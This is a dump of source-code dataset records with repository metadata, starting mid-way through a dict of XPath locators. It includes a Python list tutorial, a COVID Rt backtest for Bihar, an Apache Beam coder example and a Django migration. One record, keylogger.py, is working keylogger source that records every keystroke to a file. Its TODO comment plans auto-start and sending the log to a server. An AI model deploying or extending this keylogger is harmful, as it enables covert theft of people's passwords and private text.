"account_record_type_university_department": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='University Department']", "contact_primary_affl_field_primary_department": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Department']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ud_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ud_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ud_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ud_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_input": "//label/span[text()='Account Record Type']/../following-sibling::input", "primary_affl_field_input": "//label/span[text()='Primary Affl Field']/../following-sibling::input", "auto_enrollment": "(//label/span[text()='Auto-Enrollment']/following::br/following::div/label/input/following-sibling::span)[1][@class='slds-checkbox--faux']", "status_mapping_field_input": "//label/span[text()='Status']/../following-sibling::input", "role_mapping_field_input": "//label/span[text()='Role']/../following-sibling::input", "acc_record_type": "//label/span[text()='Acc Record Type: {}']/following::input[1][@class='mapping-acc-rec-type input' and @type='text']", "contact_primary_affl_field": "//label/span[text()='Primary Affl Field: {}']/following::input[1][@class='mapping-affl-field input' and @type='text']", "art_ap_input_affl_empty": "(//label/span[text()='Acc Record Type: ']/following::input[1][@class='mapping-acc-rec-type input' and @type='text'])[1]", "paf_pap_input_affl_empty": "(//label/span[text()='Primary Affl Field: ']/following::input[1][@class='mapping-affl-field input' and @type='text'])[1]", } }
0
0
0
6f6d746b9a3ce48ddba1228adbb0c0e61ec61582
876
py
Python
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
'''
Things to do:
An exe / chrome extension
automatically run the script
Automatically export the text file to a server/client.
'''

from pynput.keyboard import Key, Listener

count = 0
keys = []

with Listener(on_press = on_press, on_release = on_release) as listener:
    listener.join()
19.909091
73
0.509132
'''
Things to do:
An exe / chrome extension
automatically run the script
Automatically export the text file to a server/client.
'''

from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press(key):
    global keys, count
    keys.append(key)
    count += 1

    if count > 10:
        count = 0
        write_file(keys)
        keys = []

def write_file(keys):
    with open("log.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                f.write(' ')
            elif k.find("Key") == -1:
                f.write(k)
            # f.write(str(key))

def on_release(key):
    if key==Key.esc:
        return False

with Listener(on_press = on_press, on_release = on_release) as listener:
    listener.join()
477
0
74
1981ec4ebe0a96c972dacd81ff0a61b27a12c7ff
1,707
py
Python
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 6 21:10:57 2021

@author: geoto
"""

#clear list
item=mylist3.clear()
print(item)
print('-----------------------------------------------')
#reverse list
print(mylist)
list_rev=mylist.reverse()#reverse() used inplace=True so the change takes immediate effect on mylist
print(mylist)

listaa=[19,5,34,74,2,43]
print(listaa)
xxx=listaa.sort() #sort() used inplace=True so the change takes immediate effect on the listaa
#sort list
print(listaa)

#to avoid that we can use the sorted() method as inplace=false in this case
a_list=[1,5,9,3,8,4]
print(sorted(a_list))
print(a_list)

# create list with zeros
zero_list=[0]*3
print(zero_list)

# adding lists
f_list=[1,2,3,4,5]
s_list=[6,7,8,9,10]
n_list=f_list+s_list
print(n_list)

# new list part of original list
o_list=[1,2,3,4,5,6,7,8,9,10]
n_list=o_list[3:7] #returns 4,5,6,7 (indices,3,4,5,6)
print(n_list)

lstrev=o_list[::-1]#returns list elements in reverse order
lst2=o_list[::2]# returns list elements of step 2
print(lstrev)
print(lst2)

# if list b = list a, then changes will be applied to both lists
list_a=[1,2,3,4,5]
list_b=list_a
list_b.insert(0,0)
print(list_a)
print(list_b)
print('\r')

#with copy
list_a=[1,2,3,4,5]
list_b=list_a.copy()
list_b.insert(0,0)
print(list_a)
print(list_b)

#with list
list_a=[1,2,3,4,5]
list_b=list(list_a)
list_b.insert(0,0)
print(list_a)
print(list_b)

# with slices
#with copy
list_a=[1,2,3,4,5]
list_b=list_a[:]
list_b.insert(0,0)
print(list_a)
print(list_b)

# calculation within lists
first_list=[1,2,3,4,5]
second_list=[x*x*x for x in first_list]
print(second_list)
19.848837
101
0.663152
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 6 21:10:57 2021

@author: geoto
"""

#clear list
item=mylist3.clear()
print(item)
print('-----------------------------------------------')
#reverse list
print(mylist)
list_rev=mylist.reverse()#reverse() used inplace=True so the change takes immediate effect on mylist
print(mylist)

listaa=[19,5,34,74,2,43]
print(listaa)
xxx=listaa.sort() #sort() used inplace=True so the change takes immediate effect on the listaa
#sort list
print(listaa)

#to avoid that we can use the sorted() method as inplace=false in this case
a_list=[1,5,9,3,8,4]
print(sorted(a_list))
print(a_list)

# create list with zeros
zero_list=[0]*3
print(zero_list)

# adding lists
f_list=[1,2,3,4,5]
s_list=[6,7,8,9,10]
n_list=f_list+s_list
print(n_list)

# new list part of original list
o_list=[1,2,3,4,5,6,7,8,9,10]
n_list=o_list[3:7] #returns 4,5,6,7 (indices,3,4,5,6)
print(n_list)

lstrev=o_list[::-1]#returns list elements in reverse order
lst2=o_list[::2]# returns list elements of step 2
print(lstrev)
print(lst2)

# if list b = list a, then changes will be applied to both lists
list_a=[1,2,3,4,5]
list_b=list_a
list_b.insert(0,0)
print(list_a)
print(list_b)
print('\r')

#with copy
list_a=[1,2,3,4,5]
list_b=list_a.copy()
list_b.insert(0,0)
print(list_a)
print(list_b)

#with list
list_a=[1,2,3,4,5]
list_b=list(list_a)
list_b.insert(0,0)
print(list_a)
print(list_b)

# with slices
#with copy
list_a=[1,2,3,4,5]
list_b=list_a[:]
list_b.insert(0,0)
print(list_a)
print(list_b)

# calculation within lists
first_list=[1,2,3,4,5]
second_list=[x*x*x for x in first_list]
print(second_list)
0
0
0
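A note on the copy semantics demonstrated in Lists.py above (the snippet assumes mylist and mylist3 were defined earlier): after list_b = list_a both names refer to the same object, so an insert through either name is visible through both, while copy(), list(), and slicing produce an independent list. A minimal sketch, with illustrative names that are not part of the record:

list_a = [1, 2, 3, 4, 5]
alias = list_a           # same object, second name
copied = list_a[:]       # new list with the same elements
print(alias is list_a)   # True  -> one object, two names
print(copied is list_a)  # False -> independent object
alias.insert(0, 0)
print(list_a)            # [0, 1, 2, 3, 4, 5] (changed through the alias)
print(copied)            # [1, 2, 3, 4, 5]    (unchanged)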
1cad44a594c7e9036bfadb91940e424ec03efd2b
5,209
py
Python
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
from pathlib import Path
from typing import Dict, Optional, Sequence, Tuple
from warnings import simplefilter

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools import add_constant
from tqdm import tqdm

import etl
from epimargin.estimators import analytical_MPVS
from epimargin.etl.commons import download_data
from epimargin.etl.covid19india import data_path, get_time_series, load_all_data
from epimargin.model import Model, ModelUnit
from epimargin.plots import PlotDevice, plot_RR_est, plot_T_anomalies
from epimargin.smoothing import convolution
from epimargin.utils import cwd, days

simplefilter("ignore")

root = cwd()
data = root/"data"
figs = root/"figs"

gamma = 0.2
smoothing = 12
CI = 0.95

# private data
state_cases = pd.read_csv(data/"Bihar_cases_data_Jul23.csv", parse_dates=["date_reported"], dayfirst=True)
state_ts = state_cases["date_reported"].value_counts().sort_index()
district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv")
populations = dict(zip(district_names, population_counts))

# first, look at state level predictions
(
    dates,
    RR_pred, RR_CI_upper, RR_CI_lower,
    T_pred, T_CI_upper, T_CI_lower,
    total_cases, new_cases_ts,
    anomalies, anomaly_dates
) = analytical_MPVS(state_ts, CI = CI, smoothing = convolution(window = smoothing))

plot_RR_est(dates, RR_pred, RR_CI_upper, RR_CI_lower, CI, ymin=0, ymax=4)\
    .title("Bihar: Reproductive Number Estimate Comparisons")\
    .xlabel("Date")\
    .ylabel("Rt", rotation=0, labelpad=20)
plt.ylim(0, 4)

# public data
paths = {
    "v3": [data_path(_) for _ in (1, 2)],
    "v4": [data_path(_) for _ in range(3, 13)]
}

for target in paths['v3'] + paths['v4']:
    download_data(data, target)

dfn = load_all_data(
    v3_paths = [data/filepath for filepath in paths['v3']],
    v4_paths = [data/filepath for filepath in paths['v4']]
)
state_ts = get_time_series(dfn, "detected_state").loc["Bihar"]
district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv")
populations = dict(zip(district_names, population_counts))

# first, look at state level predictions
(dates_public, RR_pred_public, RR_CI_upper_public, RR_CI_lower_public, T_pred_public, T_CI_upper_public, T_CI_lower_public, total_cases_public, new_cases_ts_public, anomalies_public, anomaly_dates_public) = analytical_MPVS(state_ts.Hospitalized, CI = CI, smoothing = convolution(window = smoothing))

plt.plot(dates_public, RR_pred_public, label = "Estimated $R_t$", color = "midnightblue")
plt.fill_between(dates_public, RR_CI_lower_public, RR_CI_upper_public, label = f"{100*CI}% CI", color = "midnightblue", alpha = 0.3)
plt.legend(["private data estimate", "public data estimate"])
plt.show()

np.random.seed(33)
Bihar = Model([ModelUnit("Bihar", 99_000_000, I0 = T_pred[-1], RR0 = RR_pred[-1], mobility = 0)])
Bihar.run(14, np.zeros((1,1)))

t_pred = [dates[-1] + pd.Timedelta(days = i) for i in range(len(Bihar[0].delta_T))]

Bihar[0].lower_CI[0] = T_CI_lower[-1]
Bihar[0].upper_CI[0] = T_CI_upper[-1]
plot_T_anomalies(dates, T_pred, T_CI_upper, T_CI_lower, new_cases_ts, anomaly_dates, anomalies, CI)
plt.scatter(t_pred, Bihar[0].delta_T, color = "tomato", s = 4, label = "Predicted Net Cases")
plt.fill_between(t_pred, Bihar[0].lower_CI, Bihar[0].upper_CI, color = "tomato", alpha = 0.3, label="99% CI (forecast)")
PlotDevice().title("Bihar Net Daily Cases: Private Data Projection vs. Public Reported Data").xlabel("Date").ylabel("Cases")
plt.plot(dates_public, new_cases_ts_public, "k-", alpha = 0.6, label="Empirical Public Data")
plt.legend()
plt.semilogy()
plt.ylim(0, 2000)
plt.show()

# # now, do district-level estimation
# smoothing = 10
# district_time_series = state_cases.groupby(["geo_reported", "date_reported"])["date_reported"].count().sort_index()
# migration = np.zeros((len(district_names), len(district_names)))
# estimates = []
# max_len = 1 + max(map(len, district_names))
# with tqdm([etl.replacements.get(dn, dn) for dn in district_names]) as districts:
#     for district in districts:
#         districts.set_description(f"{district :<142,686}")
#         try:
#             (dates, RR_pred, RR_CI_upper, RR_CI_lower, *_) = analytical_MPVS(district_time_series.loc[district], CI = CI, smoothing = convolution(window = smoothing))
#             estimates.append((district, RR_pred[-1], RR_CI_lower[-1], RR_CI_upper[-1], project(dates, RR_pred, smoothing)))
#         except (IndexError, ValueError):
#             estimates.append((district, np.nan, np.nan, np.nan, np.nan))
# estimates = pd.DataFrame(estimates)
# estimates.columns = ["district", "Rt", "Rt_CI_lower", "Rt_CI_upper", "Rt_proj"]
# estimates.set_index("district", inplace=True)
# estimates.to_csv(data/"Rt_estimates.csv")
# print(estimates)
42.349593
300
0.730275
from pathlib import Path
from typing import Dict, Optional, Sequence, Tuple
from warnings import simplefilter

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools import add_constant
from tqdm import tqdm

import etl
from epimargin.estimators import analytical_MPVS
from epimargin.etl.commons import download_data
from epimargin.etl.covid19india import data_path, get_time_series, load_all_data
from epimargin.model import Model, ModelUnit
from epimargin.plots import PlotDevice, plot_RR_est, plot_T_anomalies
from epimargin.smoothing import convolution
from epimargin.utils import cwd, days

simplefilter("ignore")

def project(dates, R_values, smoothing, period = 7*days):
    julian_dates = [_.to_julian_date() for _ in dates[-smoothing//2:None]]
    return OLS(
        RR_pred[-smoothing//2:None],
        add_constant(julian_dates)
    )\
    .fit()\
    .predict([1, julian_dates[-1] + period])[0]

root = cwd()
data = root/"data"
figs = root/"figs"

gamma = 0.2
smoothing = 12
CI = 0.95

# private data
state_cases = pd.read_csv(data/"Bihar_cases_data_Jul23.csv", parse_dates=["date_reported"], dayfirst=True)
state_ts = state_cases["date_reported"].value_counts().sort_index()
district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv")
populations = dict(zip(district_names, population_counts))

# first, look at state level predictions
(
    dates,
    RR_pred, RR_CI_upper, RR_CI_lower,
    T_pred, T_CI_upper, T_CI_lower,
    total_cases, new_cases_ts,
    anomalies, anomaly_dates
) = analytical_MPVS(state_ts, CI = CI, smoothing = convolution(window = smoothing))

plot_RR_est(dates, RR_pred, RR_CI_upper, RR_CI_lower, CI, ymin=0, ymax=4)\
    .title("Bihar: Reproductive Number Estimate Comparisons")\
    .xlabel("Date")\
    .ylabel("Rt", rotation=0, labelpad=20)
plt.ylim(0, 4)

# public data
paths = {
    "v3": [data_path(_) for _ in (1, 2)],
    "v4": [data_path(_) for _ in range(3, 13)]
}

for target in paths['v3'] + paths['v4']:
    download_data(data, target)

dfn = load_all_data(
    v3_paths = [data/filepath for filepath in paths['v3']],
    v4_paths = [data/filepath for filepath in paths['v4']]
)
state_ts = get_time_series(dfn, "detected_state").loc["Bihar"]
district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv")
populations = dict(zip(district_names, population_counts))

# first, look at state level predictions
(dates_public, RR_pred_public, RR_CI_upper_public, RR_CI_lower_public, T_pred_public, T_CI_upper_public, T_CI_lower_public, total_cases_public, new_cases_ts_public, anomalies_public, anomaly_dates_public) = analytical_MPVS(state_ts.Hospitalized, CI = CI, smoothing = convolution(window = smoothing))

plt.plot(dates_public, RR_pred_public, label = "Estimated $R_t$", color = "midnightblue")
plt.fill_between(dates_public, RR_CI_lower_public, RR_CI_upper_public, label = f"{100*CI}% CI", color = "midnightblue", alpha = 0.3)
plt.legend(["private data estimate", "public data estimate"])
plt.show()

np.random.seed(33)
Bihar = Model([ModelUnit("Bihar", 99_000_000, I0 = T_pred[-1], RR0 = RR_pred[-1], mobility = 0)])
Bihar.run(14, np.zeros((1,1)))

t_pred = [dates[-1] + pd.Timedelta(days = i) for i in range(len(Bihar[0].delta_T))]

Bihar[0].lower_CI[0] = T_CI_lower[-1]
Bihar[0].upper_CI[0] = T_CI_upper[-1]
plot_T_anomalies(dates, T_pred, T_CI_upper, T_CI_lower, new_cases_ts, anomaly_dates, anomalies, CI)
plt.scatter(t_pred, Bihar[0].delta_T, color = "tomato", s = 4, label = "Predicted Net Cases")
plt.fill_between(t_pred, Bihar[0].lower_CI, Bihar[0].upper_CI, color = "tomato", alpha = 0.3, label="99% CI (forecast)")
PlotDevice().title("Bihar Net Daily Cases: Private Data Projection vs. Public Reported Data").xlabel("Date").ylabel("Cases")
plt.plot(dates_public, new_cases_ts_public, "k-", alpha = 0.6, label="Empirical Public Data")
plt.legend()
plt.semilogy()
plt.ylim(0, 2000)
plt.show()

# # now, do district-level estimation
# smoothing = 10
# district_time_series = state_cases.groupby(["geo_reported", "date_reported"])["date_reported"].count().sort_index()
# migration = np.zeros((len(district_names), len(district_names)))
# estimates = []
# max_len = 1 + max(map(len, district_names))
# with tqdm([etl.replacements.get(dn, dn) for dn in district_names]) as districts:
#     for district in districts:
#         districts.set_description(f"{district :<142,686}")
#         try:
#             (dates, RR_pred, RR_CI_upper, RR_CI_lower, *_) = analytical_MPVS(district_time_series.loc[district], CI = CI, smoothing = convolution(window = smoothing))
#             estimates.append((district, RR_pred[-1], RR_CI_lower[-1], RR_CI_upper[-1], project(dates, RR_pred, smoothing)))
#         except (IndexError, ValueError):
#             estimates.append((district, np.nan, np.nan, np.nan, np.nan))
# estimates = pd.DataFrame(estimates)
# estimates.columns = ["district", "Rt", "Rt_CI_lower", "Rt_CI_upper", "Rt_proj"]
# estimates.set_index("district", inplace=True)
# estimates.to_csv(data/"Rt_estimates.csv")
# print(estimates)
267
0
23
bc77493303e5ad9f2e8d68e8426387e82ce4266d
1,136
py
Python
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python3
# Copyright 2021 Steve Palmer

"""Generate a complete list of test numbers and names."""

import collections
import inspect

import generic_testing

TestRecord = collections.namedtuple("TestRecord", ["class_", "testname", "test_number"])


if __name__ == "__main__":
    Main()
32.457143
111
0.582746
#!/usr/bin/env python3
# Copyright 2021 Steve Palmer

"""Generate a complete list of test numbers and names."""

import collections
import inspect

import generic_testing

TestRecord = collections.namedtuple("TestRecord", ["class_", "testname", "test_number"])


class Main:
    def __init__(self):
        alltests = []
        for name, cls in inspect.getmembers(generic_testing):
            if name.endswith("Tests") and inspect.isclass(cls):
                for name2, fun in inspect.getmembers(cls):
                    if name2.startswith("test_generic_") and inspect.isfunction(fun):
                        try:
                            test_num = int(name2[13:17])
                        except ValueError:
                            test_num = 0
                        alltests.append(TestRecord(name, name2, test_num))
        alltests.sort(key=lambda tr: f"{tr.test_number:04d}{tr.testname}{tr.class_}")
        for tr in alltests:
            print(
                f"TestRecord(test_number={tr.test_number:04d}, class_={tr.class_:30s}, testname={tr.testname})"
            )


if __name__ == "__main__":
    Main()
795
-10
49
9c0d04b816acc96817c632107ea912ad5acdddcd
4,708
py
Python
sdks/python/apache_beam/examples/cookbook/group_with_coder.py
szewi/beam
ae0de1bb5f44ab39969442932c662ecde668bce3
[ "Apache-2.0" ]
4
2020-10-09T01:46:55.000Z
2020-10-09T02:12:19.000Z
python/dataflow_examples/cookbook/group_with_coder.py
yufengzh/DataflowSDK-examples
3727e986e5835286d5bdf5bc679af5e0be090097
[ "Apache-2.0" ]
12
2019-11-13T04:59:52.000Z
2021-12-14T21:13:47.000Z
python/dataflow_examples/cookbook/group_with_coder.py
yufengzh/DataflowSDK-examples
3727e986e5835286d5bdf5bc679af5e0be090097
[ "Apache-2.0" ]
2
2017-09-23T14:41:17.000Z
2018-08-29T02:57:03.000Z
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""An example of using custom classes and coder for grouping operations.

This workflow demonstrates registration and usage of a custom coder for a user-
defined class. A deterministic custom coder is needed to use a class as a key
in a combine or group operation.

This example assumes an input file with, on each line, a comma-separated name
and score.
"""

from __future__ import absolute_import

import argparse
import logging
import sys

import apache_beam as beam
from apache_beam import coders
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.typehints import typehints
from apache_beam.typehints.decorators import with_output_types
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions


class Player(object):
  """A custom class used as a key in combine/group transforms."""


class PlayerCoder(coders.Coder):
  """A custom coder for the Player class."""

  def encode(self, o):
    """Encode to bytes with a trace that coder was used."""
    # Our encoding prepends an 'x:' prefix.
    return 'x:%s' % str(o.name)


# Annotate the get_players function so that the typehint system knows that the
# input to the CombinePerKey operation is a key-value pair of a Player object
# and an integer.
@with_output_types(typehints.KV[Player, int])
def run(args=None):
  """Runs the workflow computing total points from a collection of matches."""

  if args is None:
    args = sys.argv[1:]
  parser = argparse.ArgumentParser()
  parser.add_argument('--input',
                      required=True,
                      help='Input file to process.')
  parser.add_argument('--output',
                      required=True,
                      help='Output file to write results to.')
  known_args, pipeline_args = parser.parse_known_args(args)
  # We use the save_main_session option because one or more DoFn's in this
  # workflow rely on global context (e.g., a module imported at module level).
  pipeline_options = PipelineOptions(pipeline_args)
  pipeline_options.view_as(SetupOptions).save_main_session = True
  with beam.Pipeline(options=pipeline_options) as p:
    # Register the custom coder for the Player class, so that it will be used in
    # the computation.
    coders.registry.register_coder(Player, PlayerCoder)

    (p  # pylint: disable=expression-not-assigned
     | ReadFromText(known_args.input)
     # The get_players function is annotated with a type hint above, so the type
     # system knows the output type of the following operation is a key-value
     # pair of a Player and an int. Please see the documentation for details on
     # types that are inferred automatically as well as other ways to specify
     # type hints.
     | beam.Map(get_players)
     # The output type hint of the previous step is used to infer that the key
     # type of the following operation is the Player type. Since a custom coder
     # is registered for the Player class above, a PlayerCoder will be used to
     # encode Player objects as keys for this combine operation.
     | beam.CombinePerKey(sum)
     | beam.Map(lambda (k, v): '%s,%d' % (k.name, v))
     | WriteToText(known_args.output))


if __name__ == '__main__':
  logging.getLogger().setLevel(logging.INFO)
  run()
37.967742
80
0.731308
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""An example of using custom classes and coder for grouping operations.

This workflow demonstrates registration and usage of a custom coder for a user-
defined class. A deterministic custom coder is needed to use a class as a key
in a combine or group operation.

This example assumes an input file with, on each line, a comma-separated name
and score.
"""

from __future__ import absolute_import

import argparse
import logging
import sys

import apache_beam as beam
from apache_beam import coders
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.typehints import typehints
from apache_beam.typehints.decorators import with_output_types
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions


class Player(object):
  """A custom class used as a key in combine/group transforms."""

  def __init__(self, name):
    self.name = name


class PlayerCoder(coders.Coder):
  """A custom coder for the Player class."""

  def encode(self, o):
    """Encode to bytes with a trace that coder was used."""
    # Our encoding prepends an 'x:' prefix.
    return 'x:%s' % str(o.name)

  def decode(self, s):
    # To decode, we strip off the prepended 'x:' prefix.
    assert s[0:2] == 'x:'
    return Player(s[2:])

  def is_deterministic(self):
    # Since coded Player objects are used as keys below with
    # beam.CombinePerKey(sum), we require that this coder is deterministic
    # (i.e., two equivalent instances of the classes are encoded into the same
    # byte string) in order to guarantee consistent results.
    return True


# Annotate the get_players function so that the typehint system knows that the
# input to the CombinePerKey operation is a key-value pair of a Player object
# and an integer.
@with_output_types(typehints.KV[Player, int])
def get_players(descriptor):
  name, points = descriptor.split(',')
  return Player(name), int(points)


def run(args=None):
  """Runs the workflow computing total points from a collection of matches."""

  if args is None:
    args = sys.argv[1:]
  parser = argparse.ArgumentParser()
  parser.add_argument('--input',
                      required=True,
                      help='Input file to process.')
  parser.add_argument('--output',
                      required=True,
                      help='Output file to write results to.')
  known_args, pipeline_args = parser.parse_known_args(args)
  # We use the save_main_session option because one or more DoFn's in this
  # workflow rely on global context (e.g., a module imported at module level).
  pipeline_options = PipelineOptions(pipeline_args)
  pipeline_options.view_as(SetupOptions).save_main_session = True
  with beam.Pipeline(options=pipeline_options) as p:
    # Register the custom coder for the Player class, so that it will be used in
    # the computation.
    coders.registry.register_coder(Player, PlayerCoder)

    (p  # pylint: disable=expression-not-assigned
     | ReadFromText(known_args.input)
     # The get_players function is annotated with a type hint above, so the type
     # system knows the output type of the following operation is a key-value
     # pair of a Player and an int. Please see the documentation for details on
     # types that are inferred automatically as well as other ways to specify
     # type hints.
     | beam.Map(get_players)
     # The output type hint of the previous step is used to infer that the key
     # type of the following operation is the Player type. Since a custom coder
     # is registered for the Player class above, a PlayerCoder will be used to
     # encode Player objects as keys for this combine operation.
     | beam.CombinePerKey(sum)
     | beam.Map(lambda (k, v): '%s,%d' % (k.name, v))
     | WriteToText(known_args.output))


if __name__ == '__main__':
  logging.getLogger().setLevel(logging.INFO)
  run()
511
0
97
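Note on the record above: the embedded Beam example targets the Python 2 SDK (str-based coder output, the tuple-unpacking `lambda (k, v): ...`). The following is a minimal sketch, not part of the record, of how the same custom-coder idea could be written against a current Python 3 Beam SDK; everything except the documented Beam API (coders.Coder, coders.registry.register_coder, beam.MapTuple) is illustrative.

    # Python 3 sketch of the custom-coder pattern shown above (assumed names).
    import apache_beam as beam
    from apache_beam import coders


    class Player(object):
        """Custom key class, as in the example above."""
        def __init__(self, name):
            self.name = name


    class PlayerCoder(coders.Coder):
        """Deterministic coder; encode() must return bytes on Python 3."""
        def encode(self, o):
            return ('x:%s' % o.name).encode('utf-8')

        def decode(self, s):
            s = s.decode('utf-8')
            assert s.startswith('x:')
            return Player(s[2:])

        def is_deterministic(self):
            # Required so Player instances can be used as combine keys.
            return True


    coders.registry.register_coder(Player, PlayerCoder)


    def get_players(line):
        name, points = line.split(',')
        return Player(name), int(points)

    # Inside a pipeline, the Python 2-only "lambda (k, v): ..." step can be
    # replaced with beam.MapTuple in newer SDKs:
    #   | beam.Map(get_players)
    #   | beam.CombinePerKey(sum)
    #   | beam.MapTuple(lambda k, v: '%s,%d' % (k.name, v))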
38cf8917ebc220ff8754786994efb4af03ae9a65
644
py
Python
forum/threads/migrations/0011_thread_followers.py
successIA/Forum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
null
null
null
forum/threads/migrations/0011_thread_followers.py
successIA/Forum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
6
2020-08-13T18:54:33.000Z
2021-06-10T20:20:16.000Z
forum/threads/migrations/0011_thread_followers.py
successIA/ClassicForum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.11.22 on 2019-11-21 23:29 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models
28
141
0.68323
# -*- coding: utf-8 -*- # Generated by Django 1.11.22 on 2019-11-21 23:29 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('threads', '0010_auto_20191122_0020'), ] operations = [ migrations.AddField( model_name='thread', name='followers', field=models.ManyToManyField(related_name='thread_following', through='threads.ThreadFollowership', to=settings.AUTH_USER_MODEL), ), ]
0
431
23
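The migration in the record above wires a ManyToManyField through threads.ThreadFollowership. As a rough model-side counterpart (a sketch only: the through-model field names and the extra timestamp are assumptions, just the relation settings are taken from the migration):

    from django.conf import settings
    from django.db import models


    class Thread(models.Model):
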